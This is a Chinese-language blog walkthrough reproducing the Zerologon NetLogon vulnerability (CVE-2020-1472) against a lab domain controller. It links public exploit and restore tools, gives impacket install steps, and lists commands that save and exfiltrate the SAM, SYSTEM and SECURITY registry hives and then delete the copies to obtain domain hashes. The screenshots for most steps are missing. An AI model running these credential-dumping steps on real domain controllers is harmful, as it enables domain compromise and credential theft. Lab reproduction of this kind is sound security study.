CVE-2020-1472

  • A+
所属分类:安全文章

0x00 CVE-2020-1472复现


NetLogon 特权提升漏洞

    NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。


环境:


1.攻击机kali2020
2.靶机win2008r2---ip:192.168.124.141---主机名字:dc-01 ---域名:test.com
3.复现工具:https://github.com/dirkjanm/CVE-2020-1472
4.所需环境:python3+impacket包https://github.com/SecureAuthCorp/impacket
5.恢复工具:https://github.com/risksense/zerologon


0x01 复现过程


  1. 下载复现工具,进行检验


CVE-2020-1472


   2.获取hash值


安装impacket包

需要使用如下步骤:

git clonehttps://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令


CVE-2020-1472

获取hash值


CVE-2020-1472

CVE-2020-1472


3.   获取shell


CVE-2020-1472


4.   获取域控的原始NT哈希


先在shell中执行以下命令,获取域控账户的注册表文件

reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.save
reg save HKLMSECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save


CVE-2020-1472

 

在执行以下命令获取原始NT哈希

 

CVE-2020-1472


0x02.恢复


恢复脚本:https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数

 


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: